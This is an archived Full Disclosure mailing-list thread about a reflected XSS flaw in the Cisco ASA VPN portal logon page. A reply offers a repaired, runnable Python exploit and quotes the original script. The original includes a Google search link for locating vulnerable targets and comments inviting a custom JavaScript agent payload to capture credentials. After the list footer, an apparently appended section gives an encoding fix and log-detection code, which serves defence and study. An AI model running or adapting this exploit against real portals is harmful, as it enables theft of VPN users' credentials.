Full Disclosure mailing list archives
Re: Cisco ASA VPN - Zero Day Exploit
From: Joey Maresca <jmaresca () gmail com>
Date: Thu, 18 Feb 2016 10:03:56 -0600
For folks who want code that runs, I did you all a favor, fixed the indent issues, removed unused libraries, fixed SSL certificate validation checks causing failures, fixed typos that prevent running, killed dead code, made sure it actually used the Port input. All while stripping out the unnecessary fluff. It may not be perfect but it will at least now run.

    import ssl
    import sys
    import http.client

    if __name__ == '__main__':
        try:
            Target = sys.argv[1]
            Port = int(sys.argv[2])
            # Here goes your custom JS agent code
            Payload = "alert(1)"
            # The username value closes the hidden input's value attribute with %22
            # and appends accesskey/onclick attributes carrying the payload
            VulnerableURL = ("/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0"
                             "&username=juansacco%22%20accesskey%3dX%20onclick%3d" + Payload +
                             "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_")
            CraftedRequest = VulnerableURL
            # Start the connection; certificate validation is disabled on purpose,
            # since the portal usually presents a self-signed certificate
            connection = http.client.HTTPSConnection(Target, Port, context=ssl._create_unverified_context())
            connection.request('GET', CraftedRequest)
            Response = connection.getresponse()
            print("Server status response:", Response.status, Response.reason)
            data = Response.read().decode('utf-8', 'replace')
            vulnerable = "Target is not vulnerable"
            # Find the injection on the response
            for line in data.splitlines():
                if "juansacco" in line:
                    vulnerable = "Target is vulnerable"
            print("Result of the test:", vulnerable)
            connection.close()
        except Exception as e:
            print("Exploit connection closed " + str(e))

On Wed, Feb 17, 2016 at 4:11 AM, Juan Sacco <juansacco () gmail com> wrote:
    # Exploit author: Juan Sacco - jsacco () exploitpack com
    # Affected program: Cisco ASA VPN Portal - Zero Day
    # Cisco ASA VPN is prone to a XSS on the password recovery page.
    # This vulnerability can be used by an attacker to capture other user's credentials.
    # The password recovery form fails to filter properly the hidden inputs fields.
    #
    # This Zero Day exploit has been developed and discovered by Juan Sacco.
    # Exploit Pack - Team http://exploitpack.com
    #
    # Release Dates:
    # Reported to Cisco PSIRT Feb 4/2016
    # Cisco Dev Team working on a fix Feb 15/2016
    # Cisco PSIRT report a CVE Feb 15/2016
    # Exploit Pack disclose the bug Feb 15/2016
    # Disclosure of the Exploit Feb 16/2016
    #
    # Look for vulnerable targets here: https://www.google.nl/#safe=off&q=+%2F%2BCSCOE%2B%2F
    # More than 18.000 results in Google only

    import string, sys
    import socket, httplib
    import telnetlib

    def run():
        try:
            Target = sys.argv[1]
            Port = int(sys.argv[2])
            # Here goes your custom JS agent code
            Payload = "alert(1)"
            VulnerableURL = "/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d" + Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_"
            CraftedRequest = VulnerableURL
            # Start the connection
            connection = httplib.HTTPSConnection(Target)
            connection.request('GET', CraftedRequest)
            Response = connection.getresponse()
            print "Server status response:", Response.status, Response.reason
            data = Response.read()
            vulnerable = "Target is not vulnerable"
            for line in str(data).splitlines():
                if "juansacco\\\"" in line:
                    vulnerable = "Target is vulnerable"
            if vulnerable != "Not vulnerable":
                print "Result of the test:", vulnerable
            # Find the injection on the response
            connection.close()
        except Exception,e:
            print "Exploit connection closed " + str(e)

    if __name__ == '__main__':
        print "Cisco VPN ASA Exploit - Zero Day"
        print "################################"
        print "Author: Juan Sacco - jsacco () exploitpack com"
        try:
            Target = sys.argv[1]
            Port = sys.argv[2]
        except IndexError:
            pass
        run()

_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
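The probe in both posts decides "vulnerable" as soon as the canary string comes back in the body, which also fires on a portal that reflects the username HTML-encoded (and Juan's version further compares against a string it can never equal). The following is an added example, not code from either post: it rebuilds the same request path with urlencode, shows the attribute-injection bug beside the encoded form of the same hidden input, classifies a response by whether the closing quote comes back raw, and flags the attack pattern in access-log lines. The render_* functions are stand-ins for how the portal page is assumed to build its hidden input, and the log lines are constructed, not captured from a device.

```python
import html
import re
import urllib.parse

MARKER = "juansacco"                 # same canary the posted PoC searches for
LOGON_PATH = "/+CSCOE+/logon.html"
HIDDEN_INPUT = '<input type="hidden" name="username" value="%s">'  # assumed page template


def build_probe_path(marker=MARKER, js="alert(1)"):
    """Rebuild the PoC request path. The username value closes the hidden input's
    value attribute with a double quote, then smuggles accesskey/onclick into the tag."""
    username = '%s" accesskey=X onclick=%s sacco' % (marker, js)
    params = [
        ("reason", "2"), ("a0", "63"), ("a1", ""), ("a2", ""), ("a3", "0"),
        ("next", ""), ("auth_handle", ""), ("status", "0"),
        ("username", username), ("password_min", "0"), ("state", ""),
        ("tgroup", ""), ("serverType", "0"), ("password_", ""),
    ]
    # quote (not quote_plus) so spaces become %20 as in the posted URL
    return LOGON_PATH + "?" + urllib.parse.urlencode(params, quote_via=urllib.parse.quote)


def username_from_path(path):
    """Decode the username parameter the way the server sees it after URL decoding."""
    query = urllib.parse.urlsplit(path).query
    return urllib.parse.parse_qs(query)["username"][0]


def render_vulnerable(username):
    """The defect the thread describes: untrusted input lands in an attribute value raw."""
    return HIDDEN_INPUT % username


def render_fixed(username):
    """The fix: HTML-encode the value including the double quote (quote=True),
    so the attribute cannot be closed early and no new attributes can be added."""
    return HIDDEN_INPUT % html.escape(username, quote=True)


def classify_reflection(body, marker=MARKER):
    """'unescaped' if the marker is followed by a raw double quote (break-out worked),
    'escaped' if the marker is reflected but the quote was neutralised, else 'absent'."""
    if marker + '"' in body:
        return "unescaped"
    if marker in body:
        return "escaped"
    return "absent"


# Detection side: combined-log-format request field and an event-handler attribute
# appearing after a quote inside the decoded username value.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/\d\.\d"')
HANDLER_RE = re.compile(r'["\'][^"\']*\bon\w+\s*=', re.IGNORECASE)


def is_logon_xss_attempt(log_line):
    """True when a request to the logon page carries an HTML event handler in username."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    url = urllib.parse.urlsplit(m.group(1))
    if url.path != LOGON_PATH:
        return False
    for value in urllib.parse.parse_qs(url.query).get("username", []):
        if HANDLER_RE.search(value):
            return True
    return False


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Feb/2016:10:03:56 -0600] "GET ' + build_probe_path() + ' HTTP/1.1" 200 5120',
    '198.51.100.7 - - [18/Feb/2016:10:04:01 -0600] "GET /+CSCOE+/logon.html?reason=2&username=alice HTTP/1.1" 200 5120',
    '198.51.100.9 - - [18/Feb/2016:10:04:10 -0600] "GET /+CSCOE+/portal.html HTTP/1.1" 302 0',
]


if __name__ == "__main__":
    probe = build_probe_path()
    user = username_from_path(probe)
    print("probe path:", probe)
    for name, page in (("vulnerable", render_vulnerable(user)), ("fixed", render_fixed(user))):
        print("%-10s -> %s" % (name, classify_reflection(page)))
    for line in SAMPLE_LOG:
        print(is_logon_xss_attempt(line), line[:70])
```

Against a real target, feed the body returned for the probe path into classify_reflection and treat only "unescaped" as a positive; "escaped" means the value is reflected but the fix (or a WAF) is encoding it, which the marker-only check in the posts cannot tell apart.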
Current thread:
- Cisco ASA VPN - Zero Day Exploit Juan Sacco (Feb 18)
- Re: Cisco ASA VPN - Zero Day Exploit Joey Maresca (Feb 22)
- Re: Cisco ASA VPN - Zero Day Exploit Mark-David McLaughlin (marmclau) (Feb 22)
- Re: Cisco ASA VPN - Zero Day Exploit Daniel Hadfield (Feb 22)
- Re: Cisco ASA VPN - Zero Day Exploit Joey Maresca (Feb 25)